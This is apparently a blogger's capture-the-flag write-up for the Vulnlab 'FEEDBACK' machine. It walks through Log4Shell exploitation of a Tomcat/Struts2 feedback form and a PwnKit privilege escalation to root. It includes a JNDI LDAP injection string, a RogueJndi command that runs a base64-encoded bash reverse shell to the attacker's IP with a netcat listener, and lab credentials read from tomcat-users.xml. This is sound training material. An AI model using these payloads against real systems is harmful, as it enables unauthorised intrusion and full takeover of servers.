chidunguyen.com

FEEDBACK-VL Notes

FEEDBACK-VL

Written by

Du

in

Here is my notes on FEEDBACK box from Vulnlab.

FEEDBACK: 10.10.77.246

PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http    Apache Tomcat 9.0.56
|_http-title: Apache Tomcat/9.0.56
|_http-favicon: Apache Tomcat

403 Access Denied - Host Manager, Manager and Server Status. 


/examples and /docs are BIG NOPE !


/feedback is the most interesting one.

http://10.10.77.246:8080/feedback/

Source page of /feedback:

        <!-- Build with Java, Struts2 & Log4J -->     


Apache Log4J exploit ? 

Apache Log4J exploit example: #FEEDBACK-VL

java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname 10.8.0.71

${jndi:ldap://10.8.0.71:1389/o=tomcat}  - WORKS ! 

Apply it to all input fields in /feedback page. 

echo 'bash -c bash -i >&/dev/tcp/10.8.0.71/1234 0>&1' | base64

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuOC4wLjcxLzEyMzQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.8.0.71"

┌──(root㉿kali)-[/home/kali/VL/FEEDBACK]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.77.246] 59500

whoami
tomcat
hostname
ip-10-10-10-7
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)

USER-SHELL !

PRIV ESC:

python3 -c 'import pty; pty.spawn("/bin/bash")'

tomcat@ip-10-10-10-7:~/conf$ pwd
pwd
/opt/tomcat/conf
tomcat@ip-10-10-10-7:~/conf$ tail tomcat-users.xml
tail tomcat-users.xml
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <user username="admin" password="H2RR3rGDrbAnPxWa" roles="manager-gui"/>
  <user username="robot" password="H2RR3rGDrbAnPxWa" roles="manager-script"/>

</tomcat-users>

tomcat@ip-10-10-10-7:/tmp$ python3 CVE-2021-4034.py
python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# whoami
whoami
root
# id
id
uid=0(root) gid=1001(tomcat) groups=1001(tomcat)

-Vulnerable to CVE-2021-4034 ! 

-ROOT SHELL ! 

# whoami
whoami
root
# id
id
uid=0(root) gid=1001(tomcat) groups=1001(tomcat)
# pwd
pwd
/root
# cat root.txt
cat root.txt
VL{REDIRECTED}


ROOT.TXT: VL{REDIRECTED}

More posts